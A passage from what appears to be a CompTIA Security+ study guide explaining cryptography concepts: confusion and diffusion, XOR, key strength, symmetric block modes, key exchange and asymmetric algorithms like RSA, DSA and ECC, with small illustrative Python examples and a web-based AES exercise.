encryption with the other. Also known as public key cryptography, since one key can be shared with
the public without compromising the security of the other. Asymmetric cryptography can
be used to provide authenticity as well as confidentiality.
Cryptographic Converts data into a hash, or unique signature. The hash can't be turned back into the
hashing original data, but can be compared to the data to verify its integrity and/or authenticity.

Modern cryptosystems tend to be fairly complex and interrelated suites, using different methods, protocols,
and algorithms to achieve a set of security goals. For example, to establish an SSL/TLS connection for a secure
web connection you need a cipher suite including all three types of algorithm as well as a pseudorandom
number generator. A robust cryptosystem can protect the entire CIA triad under a wide variety of
circumstances while remaining transparent to the user. A flawed one can put your data at constant risk while
giving you a false sense of security.


Confusion and diffusion


As a simple view of classical cryptography shows, designing a secure cipher isn't easy. One important factor
is that it should never be apparent how "close" an incorrect key is to the correct one. Otherwise an attacker
can just make guesses and narrow them down until they get the right one. Another is that even if an attacker
knows some of the plaintext contents of a message, comparing that against the ciphertext shouldn't give any
useful insights as to the key.

Exam Objective: CompTIA SY0-501 6.1.10, 6.1.11


Two of the primary principles used to overcome these problems today were first spelled out in "Communication
Theory of Secrecy Systems," a 1949 paper by the mathematician and cryptographer Claude Shannon that is
considered one of the foundational documents of modern cryptography.

Confusion Making the mathematical relationship between the plaintext and the key as complex as
possible, so that a partially correct key is useless to an attacker. In particular, every bit or
character of the plaintext should be acted upon by more than one bit or character of the key. In
a cipher with very strong confusion, changing a single bit of the key might change half the bits
of the entire ciphertext.
Diffusion Breaking up patterns in the plaintext so they won't be at all apparent in the ciphertext, so that
known plaintext contents won't be useful in decoding the ciphertext. In a cipher with very
strong diffusion, changing a single bit of the plaintext might change half the bits of the entire
ciphertext.

Encryption algorithms today tend to be mathematically complex ciphers, relying on a combination of
substitution and transposition methods to create ciphertext that's diffuse enough to be hard to distinguish from
random data, and confused enough that it's very computationally expensive to decode without the key. An
ideal cipher is designed to be vulnerable only to brute force attacks which try every possible key in sequence,
and uses keys long and complex enough that even a determined attacker with a lot of computing resources
can't mount such an attack in a reasonable amount of time.
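You can observe confusion and diffusion in action with a strong modern cipher. The Python sketch below (which
assumes the third-party cryptography package is installed) flips a single plaintext bit and shows that roughly
half the ciphertext bits change, the avalanche effect that both properties produce:

import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def encrypt_block(key, block):
    enc = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
    return enc.update(bytes(block)) + enc.finalize()

key = os.urandom(16)
pt1 = bytearray(os.urandom(16))                 # one random 128-bit block
pt2 = bytearray(pt1)
pt2[0] ^= 0b00000001                            # flip a single plaintext bit

c1, c2 = encrypt_block(key, pt1), encrypt_block(key, pt2)
changed = sum(bin(a ^ b).count("1") for a, b in zip(c1, c2))
print(changed, "of 128 ciphertext bits changed")   # typically around 64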
While there are exceptions, today encryption is usually used openly according to common standard
algorithms and protocols, often tightly integrated with existing software applications and standards. Unless
you're a cryptographer or a spy you're probably not going to have to worry about the exact mathematics being
used and you don't really need to hide the fact that you're encrypting data; you just need to make sure you're
using appropriate types of encryption with keys strong enough to suit your security needs.

Note: You might have noticed that a classical "unbreakable" OTP doesn't actually use either confusion
or diffusion: every bit of the plaintext corresponds to a single bit of the key to produce a single bit of
ciphertext. In the same paper, Shannon proved that such a OTP is unbreakable specifically because it
uses (and absolutely never reuses) an arbitrarily long, truly random key. Only a cipher that meets those
requirements is unbreakable. Since almost every other form of encryption relies on keys that are finite,
pseudorandom, and/or reused, it needs confusion and diffusion to strengthen it.


XOR functions
You're not going to encrypt or decrypt data by hand, and you'll probably never need to know the detailed
mathematics behind encryption algorithms. At the same time, it helps to understand how plaintext,
ciphertext, and keys can be combined or transformed.

Exam Objective: CompTIA SY0-501 6.2.6.1


One of the most common mathematical operations used in encryption is the exclusive OR (XOR) function.
Like any Boolean function used in digital systems, it receives inputs based on binary values, and outputs a
single binary value. In XOR's case, the output is true, or 1, only if the inputs are different. If they're the same,
it's false, or 0.
0 + 0 = 0
0 + 1 = 1
1 + 0 = 1
1 + 1 = 0

For a simple demonstration of how XOR can be used in cryptography, imagine that Alice is sending a digital
message using a one-time pad. Both the initial plaintext and the keystream in the pad are binary bits, so she
can combine them in an XOR operation.
Plaintext: 01000011 10100010
Keystream: 10010111 11001000
Ciphertext: 11010100 01101010

One feature of XOR transformations is their symmetry. Since Bob has his own copy of the same keystream in
his own one-time pad, by starting at the same spot he can compare it to the ciphertext and learn the original
plaintext.
Ciphertext: 11010100 01101010
Keystream: 10010111 11001000
Plaintext: 01000011 10100010
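The same round trip is easy to verify in code. Here's a minimal Python sketch using the exact bit patterns from
the example above:

plaintext = bytes([0b01000011, 0b10100010])
keystream = bytes([0b10010111, 0b11001000])

ciphertext = bytes(p ^ k for p, k in zip(plaintext, keystream))
recovered  = bytes(c ^ k for c, k in zip(ciphertext, keystream))

print(" ".join(format(b, "08b") for b in ciphertext))   # 11010100 01101010
assert recovered == plaintext                           # XOR with the same keystream undoes itself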

Note: For anything other than a one-time pad, an XOR transformation alone isn't very secure since it
doesn't really add any confusion or diffusion, but it's commonly used as one step of a more complex
encryption or decryption algorithm.

Key strength
In general, the work factor of any encryption depends both on the algorithm, and the choice of key.
Encryption keys aren't synonymous with passwords, but the two have a lot in common, and often are directly
interrelated. Like a password, the longer and harder a key is to guess, the more secure it is, so key strength is
often described in terms of its length, such as 128-bit. Unlike a password, a key is usually of a fixed length
depending on the encryption algorithm, and isn't intended to be manually remembered or entered by a human.
The latter means that many algorithms generate keys without human input, using a random or pseudorandom
number generator.

Exam Objective: CompTIA SY0-501 6.1.16, 6.1.28.1, 6.1.28.2, 6.1.28.9, 6.4.2.5


Assuming the key is generated randomly and the algorithm has no flaws, a key can be guessed only by brute
force attacks which try every possible key in sequence. For a key that's n bits long, there are 2^n possible
combinations. For a long time a 56-bit DES key was considered strong: such a key has 2^56, or
72,057,594,037,927,936, possible values. As computing power advanced, this rapidly became inadequate: by the
end of the 1990s, purpose-built cracking hardware could break a 56-bit key in little more than a day.
Fortunately, every bit you add doubles the strength of the key. Today, a 128-bit AES key is considered strong
encryption for most purposes. Barring any other flaws, that means 3.4 x 10^38 possible solutions: enough to
keep a modern supercomputer busy for longer than the universe has existed. That's not a reason to call
encryption "finished": advances in quantum computing are just one thing that could make even a perfect
128-bit key vulnerable.
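If you want to see how quickly the keyspace grows, a couple of lines of Python make the point; the numbers
below match the figures in the text:

for bits in (56, 64, 128, 256):
    print(f"{bits}-bit key: 2**{bits} = {float(2 ** bits):.3e} possible keys")
# 56-bit: about 7.2e+16; 128-bit: about 3.4e+38; 256-bit: about 1.2e+77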


Also, like passwords or their physical namesakes, keys can be lost or stolen, leaving data compromised or
inaccessible.
 Key storage is the most obvious problem: encryption keys must be held somewhere, especially when
they're not in the form of human-readable passwords. Keeping stored keys from being accessed and
used by unauthorized users or programs is an important part of any secure cryptosystem.
 Secure key exchange between parties in an encrypted conversation is even more of a challenge, which
different implementations solve in different ways.
 Another problem is key escrow, when encryption keys are shared with a third party. Sometimes this is
for the user's benefit, like backing up the key for an encrypted drive in case it's lost; other times key
escrow might be required by an employer or government agency to protect the organization's interests.
Either way, more people in on any secret, however well-intentioned they might be, means more
chances for the secret to be compromised.

Note: At some point, everyone learning about cryptography wonders, "why not just encrypt everything
with stupidly long keys so even future supercomputers can't crack them?", but there are a couple
answers to that. One is that encryption and decryption are computationally expensive to begin with, and
longer keys mean slower throughput and higher latency, especially on low-power devices.
Sometimes specialized hardware is used to accelerate encryption or decryption: this speeds things up,
but also makes it harder to upgrade to new algorithms or even just larger keys. The other reason is that
the criminal, military, and espionage uses for cryptography have caused many governments to restrict
civilian use of strong encryption. In particular, during the Cold War the US government classified
encryption technologies as military munitions and imposed strict rules on their use and export. These
rules were gradually loosened (but not entirely eliminated) as encryption became a key part of civilian
communications, but with so much computing technology designed in and distributed from the US, they
made a strong mark on developing standards and older protocols.

Algorithm choice
Even if you choose a long random key, most algorithms aren't perfect. Some have mathematical flaws that an
attacker can exploit: a 128-bit key used with a flawed algorithm might be guessed as easily as a flawless 64-bit
key, making it effectively only 64 bits and not very secure at all today. Remember, every bit you remove from a
key's effective strength halves the time needed to crack it. Related to that, different types of encryption
require different key lengths. In particular, the mathematics of asymmetric encryption means that keys have to be longer
- a 1024-bit asymmetric key might be only as strong as an 80-bit symmetric key. Older algorithms in
particular commonly only support short keys that make them easier to break, whether or not they have
mathematical flaws on top of that.

Exam Objective: CompTIA SY0-501 6.1.7, 6.1.19, 6.1.23, 6.1.27, 6.1.28.3


Even if the algorithm itself is sound, the particular implementation might have flaws. This is especially the
case when it comes to key generation, since ideal keys are as close to random as possible, and truly random
numbers are surprisingly difficult to generate on a computer. A pseudorandom number generator is usually
good enough for effective cryptography, but only if it's used correctly. Coding errors, careless shortcuts, or
even deliberate backdoors written into the software can create weak keys that attackers could exploit.
Algorithms and implementations alike vary in their resilience against complex cryptographic attacks. Known
plaintext or sufficiently large quantities of ciphertext can make attacks easier, and sometimes just one secret
being leaked can compromise an entire cryptosystem. There are even side channel attacks which gather clues
from an implementation's observable behavior, such as timing or power consumption, without directly trying to
crack the algorithm itself. Strongly resilient cryptography is designed so that a partial compromise of confidentiality won't
make the whole system collapse.
When you choose encryption methods you'll have to consider a number of factors, including available
protocols, industry standards, and relative performance of different algorithms. Also, consider how well-
proven the technology is. Cryptographers love nothing more than to study algorithms and their specific

implementations, trying to tear them apart and find every potential flaw. For them, discovering and publishing
a flaw in a cryptosystem, especially a popular one, isn't just a personal victory but a professional achievement
that can lead to industry status and job offers. This means that even if a popular and well-established
cryptographic technology isn't the strongest available, it's probably easy for you to perform a little research to
understand its flaws and avoid unpleasant surprises. Lesser-known tools and secret algorithms by contrast are
likely to have more uncorrected flaws which attackers might learn, or already know. This makes security
through obscurity particularly dangerous for cryptography.

Cryptographic modules
Cryptography is difficult and exacting. If you're an application developer who wants to encrypt data for
storage or transport, you can't afford a weak encryption implementation that leaves data vulnerable or reduces
performance. If you're using someone else's application for encryption, you need to know that they didn't
make mistakes implementing it, or that someone didn't tamper with its encryption functions. Fortunately,
not every application that uses encryption needs to have its own internal encryption/decryption engine.
Instead, the application can simply select the algorithm it wants to use and hand off the actual work to a
separate cryptographic module that actually implements the algorithm.

Exam Objective: CompTIA SY0-501 6.1.25


Any application using encryption can connect to a cryptographic module using a standard programming API;
the application specifies the algorithm it wants to use, and the module does the work, just like any other
external library. The module itself could be purely a software library, or it might interface with hardware
devices such as cryptographic accelerators or key generators. For instance, a cryptographic module can be
built into a smart card with its own internal keys and cryptographic processor. To make sure a module is
authentic and hasn't been tampered with, it can be cryptographically signed by a certifying body.
Standards for cryptographic modules vary, but remember that a module must both conform to the standards of
the application calling it, and the cryptographic quality standards of the certifying body. For example,
Microsoft operating systems and applications use the Microsoft CryptoAPI (CAPI) to provide encryption
services for applications. A CAPI module is called a cryptographic service provider (CSP) and must be
digitally signed by Microsoft. Windows verifies the signature of each CSP when it's first loaded and
periodically thereafter to make sure it hasn't been changed.
In the US and Canada, government and private regulations commonly call for cryptographic modules to be
validated according to the FIPS 140-2 standard published by NIST. FIPS 140-2 defines four security levels
for cryptographic modules, and validated products are approved for use in sensitive but unclassified
applications.

Discussion: Cryptography basics


1. What are the main relative weaknesses of classical substitution ciphers vs. transposition ciphers?
Since useful data (like text) is non-random, it's hard for a substitution cipher to hide common character
patterns and frequencies, making them vulnerable to attack. Transposition ciphers don't have that
problem, but a partially correct key might reveal just enough of the ciphertext to help an attacker finish
the job.
2. If one-time pads are so low-tech but so secure, why aren't we using them all the time?
Possible reasons include that the key has to be at least as long as the message, it needs to be completely
random, and it has to be somehow shared between two parties while being kept completely secret from
everyone else.
3. Has there ever been a time steganography would have been useful to you? If not, what future situation
might make it come in handy?
Answers may vary, but hopefully don't include criminal activity.
4. What might be a problem with a cipher that has high confusion but low diffusion? What about the
reverse?

A message encoded with a low-diffusion cipher may have recognizable patterns so that if you know some
of its contents you can easily decipher the rest. A low-confusion cipher has a simple relationship between
the ciphertext and the key, so if you have a partially correct key you can more easily narrow down to the correct
one.
5. If time allows, browse to http://www.dcode.fr/enigma-machine-cipher. It's an online
example of the Enigma machine, one of the most famous and elaborate cryptographic devices before
digital cryptography was invented.

Symmetric encryption
Most of the time, data is encrypted using symmetric ciphers, algorithms that use the same key to encrypt and
decrypt data in much the same way as a classical cipher. The chief advantage of symmetric-key cryptography
is that it's possible to achieve high security with a fairly short key and limited computational complexity, so
it's relatively easy to encrypt large amounts of data for either transport or storage. The chief disadvantage is
that the key must be kept secret to avoid compromising security—for this reason, symmetric encryption is
often called secret-key or private-key cryptography.

Exam Objective: CompTIA SY0-501 6.1.1, 6.1.15


Symmetric ciphers can be categorized by how they encrypt data, either a bit at a time in a stream, or in blocks of
a discrete size.

 Stream ciphers operate in a fashion analogous to a one-time pad. To encrypt, the plaintext is compared
bit by bit to a corresponding keystream made from the key. To decrypt, the process is reversed. Stream
ciphers tend to be very high-performance and are well-suited to data streams of arbitrary length, like
network communication. However, the nature of a finite length encryption key means that they can
never be as secure as a one-time pad; in fact, they're particularly vulnerable to certain attacks unless
very carefully designed.
 Block ciphers encrypt plaintext in fixed-size blocks, applying the complete key to each block. The key
and block sizes don't need to be the same, but the important thing is that all the data must be broken up
into the algorithm's block size, typically 64 or 128 bits. If there's not enough data to fill a whole block,
additional padding must be added to round out the size. Block ciphers are well-suited to bulk storage,
like encrypted drives, but since the blocks are fairly short they're easy to adapt to communications as
well. While this has more processing overhead than using a stream cipher, it's easier to keep secure.


Semantic security
One of the reasons why a one-time pad can be perfectly secure is that the key is as long as the plaintext and
no part of it ever gets reused. This means that even if the plaintext frequently repeats the same data sequence,
each repetition is encoded differently and produces different ciphertext—so different, in fact, that there's no
way an attacker can tell the difference between the ciphertext of a plaintext sequence that's repeated a hundred
times, and that of a hundred unique plaintext sequences of the same size. This property is called semantic
security, and it's essential for a truly secure cryptosystem. Without it, an attacker can collect data over time
and look for patterns that will reveal more about the underlying plaintext and enable any number of other
attacks.

Exam Objective: CompTIA SY0-501 6.1.14


For a rather visible example, imagine you're emailing confidential images using a block cipher that simply
encrypts every block of data with the same key. It's a strong key, so what's the harm?

Plaintext                   This uncompressed image has large areas of flat color. In the actual bitstream of
                            the file, this translates to long strings of repeated data.

Semantically insecure       Even though the key's fairly strong, it's applied the same way to each block of
ciphertext                  data in the image. Since the image has a lot of repeating data, and thus repeating
                            blocks, the ciphertext doesn't actually hide the overall nature of the image.

Semantically secure         This ciphertext actually uses the same key as the previous one; the difference is
ciphertext                  that it applies the key differently to each block. That way, even long stretches of
                            repeated color are broken up into seemingly random noise.
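The same effect is easy to demonstrate without images. The Python sketch below (assuming the third-party
cryptography package) encrypts highly repetitive data in ECB mode and shows that every repeated plaintext
block produces an identical ciphertext block:

import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key = os.urandom(16)
block = b"SIXTEEN BYTE BLK"                     # exactly one 128-bit block
plaintext = block * 4                           # repetitive, "image-like" data

ecb = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
ciphertext = ecb.update(plaintext) + ecb.finalize()

blocks = [ciphertext[i:i+16] for i in range(0, len(ciphertext), 16)]
print(len(blocks), "blocks,", len(set(blocks)), "unique")   # 4 blocks, 1 unique -- the pattern leaks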


Block cipher modes


A challenge of cipher design is how to apply the key differently over time in a way that's methodical and
predictable enough to be reliably decrypted, without producing any obvious patterns. This in itself requires an
algorithm. For block ciphers, these algorithms are called modes of operation. A variety of modes are
available, depending on the particular encryption protocol in use. Some common ones include:

Exam Objective: CompTIA SY0-501 6.1.2, 6.1.5, 6.2.2

Electronic Code Applies the key the same way to each block. ECB is the simplest method, but as you've
Book (ECB) seen it can't provide semantic security. It's fine for a single-block message, but the
longer the message is the less secure it becomes.
Cipher Block Performs an XOR operation on each block of plaintext using the previous block of
Chaining (CBC) ciphertext, then encrypts it with the key. Additionally, the first block must be combined
with a random or pseudorandom initialization vector (IV). This way, even multiple
encryptions of the same entire message won't produce the same ciphertext. A corrupted
or missing block or IV will prevent decryption of the subsequent block, but not
following blocks; this can be good or bad, depending on the application.
Cipher FeedBack Similar to CBC, but designed to operate more like a stream cipher. CFB makes it easy
(CFB) to encrypt a stream of values smaller than a block, without additional padding.
Output FeedBack Similar to CFB, but with some differences in how the encoding shifts over time.
(OFB) Compared to CFB, OFB can easily correct ciphertext errors, but this also opens it to
some attacks. It can't correct for IV errors, or missing/added bits.
Counter (CTR) Also creates a stream cipher, but each block's encryption uses a successively
incrementing counter. It has some efficiency advantages over other methods, and if used
properly doesn't sacrifice security.
Galois Counter Combines Counter mode with a hash-based authentication code to improve integrity.
Mode (GCM) While it's difficult to actually implement in code, it's very fast and secure in practice.

Initialization vectors, and the way they're used, are very important for security, but they have different
security requirements than keys. The IV doesn't need to be secret; in fact, it's often transmitted in the clear at
the start of a message. On the other hand, the IV needs to be unique, since repeating it can damage, or even
destroy, security. For this reason, an IV is often cited as an example of a cryptographic nonce, an arbitrary number
only used once. For some modes, it's important that the IV be random, pseudorandom, or at least
unpredictable, while in other modes it can be procedurally generated as long as it's never reused.
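As a concrete illustration, here's a minimal Python sketch of AES in CBC mode with a random key and IV, using
the third-party cryptography package; note the PKCS7 padding needed to fill out the final 128-bit block. It's a
sketch of the concepts just described, not production code:

import os
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key = os.urandom(16)                            # 128-bit AES key
iv = os.urandom(16)                             # unique per message; sent in the clear

padder = padding.PKCS7(128).padder()            # pad plaintext out to the 128-bit block size
padded = padder.update(b"ATTACK AT DAWN") + padder.finalize()

encryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
ciphertext = encryptor.update(padded) + encryptor.finalize()

decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
unpadder = padding.PKCS7(128).unpadder()
recovered = unpadder.update(decryptor.update(ciphertext) + decryptor.finalize()) + unpadder.finalize()
assert recovered == b"ATTACK AT DAWN"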
Block size also matters when it comes to semantic security: if you send enough blocks using a single key,
you'll risk reuse of IVs, opening your data to attack. Like keys themselves, this relationship is exponential
rather than linear: while you can safely encrypt up to 2^32 64-bit blocks (32 GB) with one key, you can send
2^64 128-bit blocks (256 exabytes). This means that 64-bit block ciphers can no longer be considered entirely
safe for particularly large data transfers or modern hard drive encryption, even if the keys and IVs themselves
are strong.

Note: Semantic security isn't a problem limited to block ciphers. In fact, if anything stream ciphers can
be harder to secure against weak IVs or other attacks designed to uncover keys based on underlying data
patterns. This is part of why streaming encryption is commonly performed by using a block cipher in a
stream-friendly mode.


Symmetric algorithms
There are a large number of symmetric encryption algorithms in common use, though many are outdated or
only used in a narrow field of applications. Often a given application or protocol will support a number of
different algorithms; if so, you'll need to choose a suitable balance of security, performance, and compatibility
for your needs. Like with all cryptography, remember that a theoretically strong but unproven method can
sometimes be a bigger risk than a flawed standard with weaknesses you can plan around.

Exam Objective: CompTIA SY0-501 6.2.1

DES Data Encryption Standard is a block cipher developed in the 1970s for hardware-based
encryption and decryption devices, and for a long time was a US government standard. It uses a
56-bit key, which was strong at the time but is much too weak for real security today. It also uses
64-bit blocks, which limits its security for large volumes of data.
3DES Triple DES was developed in the 1990s, to make a stronger standard based on DES. It simply
runs DES three times on the same 64-bit block: by using three different keys, it gets up to 168
bits. For technical reasons, that's as effective as a single 112-bit key. Unfortunately, it has some
additional cryptographic weaknesses, so NIST classifies the effective strength of 168-bit 3DES
as only 80 bits. This is good enough for most purposes, and in fact until 2016 was considered
acceptable for payment card processing, but it's no longer considered strong encryption.
Additionally, it's computationally rather expensive for its effective strength if you're not using
hardware acceleration.
AES Advanced Encryption Standard, also known as Rijndael, was adopted by NIST in 2001 after
being chosen over 14 other competitors. The original Rijndael was a block cipher with a variable
block length up to 256-bits, but the AES version specifies only 128-bit blocks. It can use 128-,
192-, or 256-bit keys, it's fast in both hardware and software, and no practical attacks have been
published against the cipher itself. This means AES can be considered the gold standard of
current encryption, though like any cipher a given implementation might have vulnerabilities
that undermine the encryption strength. The US government specifies AES-256 for Top Secret
communications, but 128 is good enough for most purposes.
Blowfish Also developed in the 1990s, Blowfish was the first strong cipher placed in the public domain,
so it became rather popular. It supports variable key sizes up to 448 bits, so can make very
effective encryption, but due to some flaws and its 64-bit block size it's no longer as popular as it
once was.
Twofish An enhanced successor to Blowfish, Twofish was another AES finalist. While it lost the
competition to Rijndael, it can be considered comparable to AES in security: it uses 128-bit
blocks with a key size of 128-, 192-, or 256-bits, and no known significant cryptographic
weaknesses.
Serpent Another former AES finalist, Serpent has the same block and key properties as Rijndael and
Twofish. It's arguably more secure than either, but placed second due to performance and
complexity issues.


Rivest Cipher / A family of ciphers developed by the cryptographer Ron Rivest, these are identified as the
Ron's Code numbered RC series. The most widely used is RC4, a stream cipher designed in 1987. RC4
has been enduringly popular since it's very quick to encode or decode even in software.
Unfortunately, it's an older design with a lot of vulnerabilities both in the cipher itself and
its common implementations; this means it's largely been replaced by block ciphers
operating in stream modes. By contrast, RC6 is a block cipher and AES finalist, but never
achieved such widespread popularity.
CAST A family of block ciphers that's been used in a variety of popular products. CAST-128 uses
64-bit blocks and keys ranging from 40- to 128-bits. CAST-256 is a former AES finalist
with 128-bit blocks and keys ranging from 128- to 256-bits.

Exercise: Symmetric encryption


You can perform this activity in any browser. It doesn't need to be in a VM. In this exercise you'll encrypt
some text using the AES standard.

Note: This exercise uses a web-based encryption tool, which may have changed or gone offline since the
time of writing.

Do This How & Why

1. Open http://aesencryption.net/ in your browser. It's a simple web tool that uses the AES encryption algorithm.

2. Encode a message.

a) In the first text field, type a message. It can be a favorite quote, random words, or whatever you like, so long as it's easy to remember.

b) In the key field, type 1234567890. Just like a password, if you wanted strong security you'd choose a sufficiently long, random key.


c) Click Encrypt. You'll use the default 128-bit encryption. The ciphertext
appears below, in base64 as well as encrypted. Base64 doesn't
add security, it just allows binary data to be encoded as ASCII
text.

3. Decode the ciphertext with the same key.

a) Select and copy the ciphertext. Be sure to get it all.

b) Paste the ciphertext into an empty Notepad file. You'll want to compare it later.

c) Paste the ciphertext into the top field on the web page. Replace the original quote, don't add to it.

d) Click Decrypt. The original text is restored.

4. Encrypt the original text with a slightly different key.

a) Copy the original text to the top window again. You want to make sure it's identical to the first time.

b) Change the key to 123456789a

c) Click Encrypt. Just a small change in the key makes a very different
ciphertext. A very small change in the plaintext would have
done the same.

5. Close your browser and Notepad.

One message encoded with two slightly different keys.


Key life cycles


Even if the key and algorithm are both strong, it's not a good idea to keep encrypting data with the same key
forever. One reason is the same reason you shouldn't keep a password forever: the longer it's in use, the longer an
attacker has to crack or otherwise compromise it, and the longer an eavesdropper can make use of a cracked
or stolen key. Another is that once you send enough data with a single key, you'll gradually end up reusing
IVs and opening your data to attack.

Exam Objective: CompTIA SY0-501 6.1.8, 6.1.17, 6.1.18, 6.1.26


Strong cryptography uses temporary keys for the actual encryption of data. Often they're used only for the
duration of a single communication session, which is why symmetric cryptography is also called session key
cryptography. Especially in asymmetric cryptography, keys used for a short term are often called ephemeral
keys, as contrasted with static keys used for longer periods.
Generating session keys is a particular challenge for symmetric transport encryption. Not only does the
session key need to be random or pseudorandom, it also needs to be known to both parties. One way to do this
is to have a long-term static key, such as one based on a user password or unique device identifier, and
combine it with some sort of nonce to create a session key. As long as both parties can synchronize their
session key creation, they have temporary secret keys, and as long as the process uses the right sort of
algorithm a session key can't be used to guess the static key. The static key can then be safely stored without
being exposed to anything other than the ephemeral key generator.
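As a rough sketch of that idea (not taken from the course files; the function name is just illustrative), the following Python snippet derives a fresh session key by running a static key and a random nonce through HMAC-SHA256. Both parties can compute the same session key from the shared static key and the transmitted nonce, but the one-way function means a captured session key can't be used to recover the static key.

    import hashlib, hmac, secrets

    def derive_session_key(static_key: bytes, nonce: bytes) -> bytes:
        # One-way derivation: the session key reveals nothing about the static key.
        return hmac.new(static_key, b"session" + nonce, hashlib.sha256).digest()

    static_key = secrets.token_bytes(32)    # long-term shared secret
    nonce = secrets.token_bytes(16)         # random value sent in the clear each session
    session_key = derive_session_key(static_key, nonce)
    print(session_key.hex())                # a fresh 256-bit key for this session only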
Generating ephemeral keys from static ones doesn't actually solve the fundamental problem of key exchange
though. Symmetric transport encryption relies on a single secret key shared both parties, however long it's
used for, and that means somehow the key has to be communicated between them without an eavesdropper
being able to discover it. There are two main ways to exchange keys, and both can be difficult.

In-band key The key is exchanged over the same communications channel that's going to be
exchange encrypted. This poses its own problem: if the channel isn't encrypted yet, how do you
keep the key secret? The nature of symmetric keys makes secure in-band exchange very
difficult. You could encrypt the key itself with another key, but that key itself needs to be
exchanged too.
Out-of-band key The key is exchanged over a different, more secure channel than the one to be encrypted.
exchange For example, you could communicate a password to someone verbally, or send a smart
card via mail or courier. Out-of-band key exchange is secure if and only if the other
channel is, and it's often less convenient, especially if keys need to be changed often.

Ephemeral keys in themselves also don't solve another problem: even if you can't generate a static key from
an ephemeral key, what happens if your static key is compromised? If it can be used to re-generate ephemeral
keys used in past sessions, an attacker who's intercepted and saved those messages can now decrypt your
whole communications history. A secure communications protocol is said to have perfect forward secrecy if a
static key is of no use to recover ephemeral keys used in past sessions. Perfect forward secrecy is very
desirable and helps to make cryptography much more resilient against particular violations of confidentiality,
but it's another feature that's hard to achieve with symmetric encryption alone.


Asymmetric encryption
Asymmetric encryption, also known as public key cryptography, was first demonstrated in the 1970s and
since then has become a vital part of public security. Like symmetric encryption, it starts with a single large
random number, but it uses specialized mathematical equations to turn it into two separate, but tightly
interrelated, keys. Anything encrypted with one key can only be decrypted with the other. The reason why it's
called public key cryptography is because one key is kept private, and the other can be shared with the public.

Exam Objective: CompTIA SY0-501 6.1.3

Anyone who has your public key can use it to encrypt a message only you can read, at least so long as you
keep your private key secret. Encrypting with your private key means anyone with the public key can read it, so if
you want to send someone else a confidential message, they'll have to send you their public key. Messages
encrypted with a private key aren't secret, but they're still very useful; if you receive a message that can be
decrypted by someone's public key, it proves the message came from that person, or at least someone using
that private key. This means public key cryptography is not only useful for confidentiality, but authentication
and non-repudiation as well.
Compared to symmetric encryption, asymmetric encryption needs much longer keys for the same effective
strength, and the relationship isn't exactly linear. Using the most popular asymmetric algorithms, a 1024-bit
key has about the same work factor as an 80-bit symmetric key, 2048 bits is equivalent to 112-bit symmetric,
and 3072 bits is equivalent to 128-bit symmetric. Related to this, asymmetric algorithms are also much
slower, enough that they're not generally used for long messages.
Asymmetric encryption is perfectly suited for some tasks that symmetric encryption is poor at, including key
exchange. Alice and Bob can exchange their public keys in cleartext without worrying who sees, then either
can use the other's public key to send secure messages that only their partner's private key can decrypt. It
doesn't even matter if the asymmetric algorithm is too slow to encrypt a lot of data: if Alice wants to start a
bulk transport to Bob, she first encrypts an AES session key with Bob's public key. Once he decrypts it, she
can send the larger message encrypted in AES.
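A minimal sketch of that hybrid approach follows, assuming the third-party Python "cryptography" package; the key sizes and padding choices shown are common options rather than requirements.

    # Hybrid encryption sketch: RSA-OAEP protects a random AES session key,
    # and AES-GCM protects the bulk data. Assumes "pip install cryptography".
    from cryptography.hazmat.primitives.asymmetric import rsa, padding
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM
    import secrets

    # Bob's key pair; Alice only ever sees the public half.
    bob_private = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    bob_public = bob_private.public_key()

    # Alice: wrap a random AES session key with Bob's public key, then encrypt the data.
    session_key = AESGCM.generate_key(bit_length=128)
    oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                        algorithm=hashes.SHA256(), label=None)
    wrapped_key = bob_public.encrypt(session_key, oaep)
    nonce = secrets.token_bytes(12)
    ciphertext = AESGCM(session_key).encrypt(nonce, b"large message...", None)

    # Bob: unwrap the session key with his private key, then decrypt the data.
    recovered_key = bob_private.decrypt(wrapped_key, oaep)
    print(AESGCM(recovered_key).decrypt(nonce, ciphertext, None))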
In addition to encryption and key exchange, public key cryptography is a key component in digital signatures
used for authentication and non-repudiation. As its name suggests it's also a central component of the public
key infrastructure used to manage security across entire networks, though PKI relies on a number of other
technologies as well.

Asymmetric algorithms
Not only are there a large number of asymmetric systems in use, but they're used for a number of different
tasks. In general, popular algorithms fall into a few categories or families, and they're generally based on
some kind of mathematical problem that's not difficult to solve in theory, but in practice can take nearly
forever unless you already know the answer.

Exam Objective: CompTIA SY0-501 6.1.6, 6.2.3.1, 6.2.3.2, 6.2.3.3, 6.2.3.4


RSA Created at MIT and named after its inventors: Ron Rivest, Adi Shamir, and Leonard
Adleman. RSA uses a private key made from two large prime numbers along with an
additional value; the public key can be easily calculated if you know the private key, but
doing the reverse is unfeasibly difficult. This sort of one-way problem is called integer
factorization. RSA keys can be as large as 4096 bits, but they're much weaker than a
symmetric key of the same size. In practice, 1024-bit keys are considered either a
minimum or newly obsolete on modern systems; anything lower is far too weak, and most
security experts recommend 2048-bit keys or more.
RSA is computationally very expensive, especially with longer keys, but since it's most
commonly used for key exchange and creating digital signatures where performance isn't
considered a big problem it's been widely implemented across many protocols and
cryptosystems. For example, RSA is the default algorithm used in the SSL/TLS certificates
used by secure websites and many other encrypted protocols.
DSA Digital Signature Algorithm was created by a former NSA employee in 1991 and soon
adopted as a NIST standard. It uses a different one-way problem called a discrete
logarithm. It is similar in overall strength to RSA at the same key length, but different in
performance. DSA allows faster key generation and decryption, but RSA is faster for data
encryption and signature verification. Which is better depends on use case, but RSA is
more popular and current DSA standards require 1024-bit keys which are no longer
considered secure.
ECC Elliptic Curve Cryptography uses algorithms based on the difficulty of calculating certain
properties of elliptical curves. The underlying math is difficult to explain and not very
important, but its main advantage is strong security with much shorter keys than other
asymmetric algorithms; for example, a 256-bit ECC key is as strong as a 3072-bit RSA
key, even if it's still only as strong as a 128-bit AES key. ECC is also much faster than
